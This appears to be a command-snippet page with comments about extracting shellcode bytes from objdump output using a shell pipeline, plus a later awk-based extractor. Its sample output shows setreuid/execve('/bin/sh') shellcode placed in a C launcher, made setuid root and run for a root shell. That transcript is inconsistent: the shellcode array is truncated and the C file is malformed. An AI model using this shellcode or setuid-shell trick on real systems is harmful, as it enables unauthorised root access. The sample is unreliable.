Get all shellcode on binary file from objdump

objdump -d ./PROGRAM|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Tired of copy-pasting to get opcodes from objdump, huh? Get more @
Sample Output
gunslinger@localhost:~/$ objdump -d shell

shell:     file format elf32-i386

Disassembly of section .text:

08048060 <.text>:
 8048060:	31 c0                	xor    %eax,%eax
 8048062:	31 db                	xor    %ebx,%ebx
 8048064:	31 c9                	xor    %ecx,%ecx
 8048066:	31 d2                	xor    %edx,%edx
 8048068:	b0 46                	mov    $0x46,%al
 804806a:	31 db                	xor    %ebx,%ebx
 804806c:	31 c9                	xor    %ecx,%ecx
 804806e:	cd 80                	int    $0x80
 8048070:	b0 0b                	mov    $0xb,%al
 8048072:	53                   	push   %ebx
 8048073:	68 2f 2f 73 68       	push   $0x68732f2f
 8048078:	68 2f 62 69 6e       	push   $0x6e69622f
 804807d:	89 e3                	mov    %esp,%ebx
 804807f:	31 c9                	xor    %ecx,%ecx
 8048081:	31 c9                	xor    %ecx,%ecx
 8048083:	53                   	push   %ebx
 8048084:	cd 80                	int    $0x80
gunslinger@localhost:~/$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31";

int main(void)
{
	(*(void(*)()) shellcode)();
}

root@localhost:/home/gunslinger/# vim shellcodetest.c
root@localhost:/home/gunslinger/# cat shellcodetest.c
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31"

int main(void)
	(*(void(*)()) shellcode)();
root@localhost:/home/gunslinger/# gcc -o shellcodetest shellcodetest.c
root@localhost:/home/gunslinger/# chown root:root shellcodetest.c
root@localhost:/home/gunslinger/# chmod 4755 shellcodetest
root@localhost:/home/gunslinger/# exit
gunslinger@localhost:~/$ ./shellcodetest
# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
# exit


What Others Think

This is better and does not rely on field widths remaining constant between objdump changes. for i in `objdump -d prog | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
lodsb · 368 weeks and 3 days ago
for zsh users: for i in `objdump -d prog | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\\\x$i" ; done
akshaykrishnanr · 302 weeks and 1 day ago
@lodsb your version breaks with filenames containing spaces and letters from the 0-9a-f range. For example, with a file named 'ab\ 23\ ' both ab and 23 will be included as opcodes. So `grep -v 'file'` is a must.
reiderroque · 236 weeks ago
Also, the command at the top will fail with binaries using 'file' as a label and referencing it with a jump. That is, opcodes generated by, e.g., a 'jz file' instruction will fall out. Though if labels are removed with, e.g., strip --strip-unneeded, it won't be an issue.
reiderroque · 236 weeks ago
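Putting the two caveats above together (the `file format` header line and a label named `file`), here is a stricter extractor, added as an example and not part of the original command or any of the comments. It anchors on objdump's line shape `<addr>:<TAB><bytes><TAB>` and reads the whole byte column, so it also keeps all seven bytes of a long instruction plus its wrapped continuation line, which the original `cut -f1-6 -d' '` truncates to six. The listing it parses is constructed inline to mimic objdump output; no binary is needed to run it.

```shell
# Stricter extractor for the byte column of `objdump -d` output. It keeps
# only lines shaped like "<addr>:<TAB><hex bytes><TAB>..." and reads the
# whole tab-delimited byte column, so the "file format" header, a label
# named 'file' and instructions longer than six bytes cannot break it.
objdump_to_hex() {
    awk -F'\t' '
        /^ *[0-9a-f]+:\t[0-9a-f][0-9a-f]/ {
            n = split($2, b, " ")
            for (i = 1; i <= n; i++)
                if (b[i] ~ /^[0-9a-f][0-9a-f]$/) out = out "\\x" b[i]
        }
        END { printf "\"%s\"\n", out }'
}

# Constructed listing (not real objdump output, but laid out the same way):
# the page's first instructions, a jump to a label named "file", and a
# 10-byte instruction that objdump wraps onto a continuation line that
# carries bytes but no mnemonic.
sample_listing() {
    printf 'shell:     file format elf32-i386\n\n'
    printf 'Disassembly of section .text:\n\n08048060 <.text>:\n'
    printf ' 8048060:\t31 c0                \txor    %%eax,%%eax\n'
    printf ' 8048062:\t74 02                \tje     8048066 <file>\n'
    printf ' 8048064:\t31 db                \txor    %%ebx,%%ebx\n'
    printf '08048066 <file>:\n'
    printf ' 8048066:\tc7 05 00 00 00 00 01 \tmovl   $0x1,0x0\n'
    printf ' 804806d:\t00 00 00 \n'
    printf ' 8048070:\tcd 80                \tint    $0x80\n'
}

# Real use: objdump -d ./PROGRAM | objdump_to_hex
# Offline demonstration on the constructed listing:
extract_sample() { sample_listing | objdump_to_hex; }
extract_sample
```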
